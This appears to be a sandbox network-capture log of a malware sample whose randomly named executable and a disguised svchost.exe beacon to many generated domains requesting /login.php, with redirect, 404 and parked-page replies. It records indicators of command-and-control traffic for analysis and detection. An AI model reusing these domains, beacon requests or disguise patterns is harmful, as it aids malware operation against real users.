Nov 11, 2024 18:13:38.731436014 CET	636	IN	Data Raw: 28 68 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3b 76 61 72 20 66 3d 22 22 3b 76 61 72 20 64 3d 30 3b 77 68 69 6c 65 28 62 21 3d 22 22 26 26 64 3c 31 30 30 29 7b 64 2b 2b 3b 77 68 69 6c 65 28 62 2e 73 75 62 73 74 72 28 Data Ascii: (h){var b=document.cookie;var f="";var d=0;while(b!=""&&d<100){d++;while(b.substr(0,1)==" "){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.subs
Nov 11, 2024 18:13:38.731445074 CET	1236	IN	Data Raw: 2c 74 72 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c Data Ascii: ,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"\|\|a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a)
Nov 11, 2024 18:13:38.731456995 CET	1236	IN	Data Raw: 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 Data Ascii: ata"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"\|\|g==="getSection"\|\|g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.
Nov 11, 2024 18:13:38.736226082 CET	1236	IN	Data Raw: 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 Data Ascii: :g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)\|\|(typeof(window[a])!=="function"&&typeof(window[a])!=="objec

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	63483	75.2.71.199	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:37.302927971 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Nov 11, 2024 18:13:37.729882956 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:13:37 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	63482	44.221.84.105	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:37.303481102 CET	352	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Nov 11, 2024 18:13:37.730304956 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	63484	188.114.97.3	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:37.435569048 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:38.055206060 CET	968	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v3ax1dhgyv%2F4bW7p3det0ml0aGT7FqEa3nF8WHayzu8RiQlVaH0gs6Rm7no3J9VTMFRJ0CqHVnn%2F5H63Neo4hznPpKj5qbpxM%2FodoS4Pbtpomda0T7mPYLlBrzmaGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9faba2c5762-TLH alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25456&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:13:40.861691952 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:41.260210991 CET	975	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBUEKqzNCMU3H8JN0B6DxVos9TpjafkmRUIY1ycNkpYAF0IgR5p4PIJJRE%2B4kVkdvbj6D%2BiGGaheT2DmX9dXHCTbPsL8GLt%2Bcgj1n5k0xdbR9ES2XE9odoRJTfyyFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fea0ec9705762-TLH alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25469&sent=4&recv=6&lost=0&retrans=0&sent_bytes=968&recv_bytes=486&delivery_rate=113023&cwnd=32&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	63485	18.208.156.248	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:37.488403082 CET	352	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Nov 11, 2024 18:13:37.917001009 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	63492	64.190.63.136	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:38.232637882 CET	348	OUT	GET /login.php?sub1=20241112-0413-3653-b9c7-4bbc444bdc48 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345193.3163760
Nov 11, 2024 18:13:38.877535105 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:38 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2aR2X2tn634XJmbhLe9nbA7FZP49f9RBCLux1Y3dARdyFF7/jskWtBTsQGWfFrlxFlLAn2UAw6d/zf2HEjEQdg== last-modified: Mon, 11 Nov 2024 17:13:38 GMT x-cache-miss-from: parking-7596689c44-prw7b server: Parking/1.0 Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 32 61 52 32 58 32 74 6e 36 33 34 58 4a 6d 62 68 4c 65 39 6e 62 41 37 46 5a 50 34 39 66 39 52 42 43 4c 75 78 31 59 33 64 41 52 64 79 46 46 37 2f 6a 73 6b 57 74 42 54 73 51 47 57 66 46 72 6c 78 46 6c 4c 41 6e 32 55 41 77 36 64 2f 7a 66 32 48 45 6a 45 51 64 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED] Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2aR2X2tn634XJmbhLe9nbA7FZP49f9RBCLux1Y3dARdyFF7/jskWtBTsQGWfFrlxFlLAn2UAw6d/zf2HEjEQdg==><head><meta charset="utf-8"><title>vofycot.com - This website is for sale! - vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
Nov 11, 2024 18:13:38.877563953 CET	1236	IN	Data Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
Nov 11, 2024 18:13:38.877573967 CET	1236	IN	Data Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
Nov 11, 2024 18:13:38.877646923 CET	1236	IN	Data Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
Nov 11, 2024 18:13:38.877657890 CET	848	IN	Data Raw: 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 Data Ascii: -size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__conte
Nov 11, 2024 18:13:38.877670050 CET	1236	IN	Data Raw: 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 Data Ascii: essage__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interact
Nov 11, 2024 18:13:38.877680063 CET	212	IN	Data Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 2d 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 Data Ascii: splay:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-co
Nov 11, 2024 18:13:38.877690077 CET	1236	IN	Data Raw: 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b Data Ascii: lor:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:in
Nov 11, 2024 18:13:38.877702951 CET	1236	IN	Data Raw: 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 Data Ascii: ed+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{backgroun
Nov 11, 2024 18:13:38.877716064 CET	1236	IN	Data Raw: 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 Data Ascii: ight{background:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;backgro576und-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-tr
Nov 11, 2024 18:13:38.882539034 CET	1236	IN	Data Raw: 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 74 77 6f 2d 74 69 Data Ascii: ited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__hea

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	63517	23.253.46.64	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:40.852374077 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Nov 11, 2024 18:13:41.307938099 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:13:35 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:13:41.308182001 CET	169	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.6	63520	154.212.231.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:40.853300095 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:13:41.723053932 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:41 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	63519	85.17.31.82	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:40.854620934 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

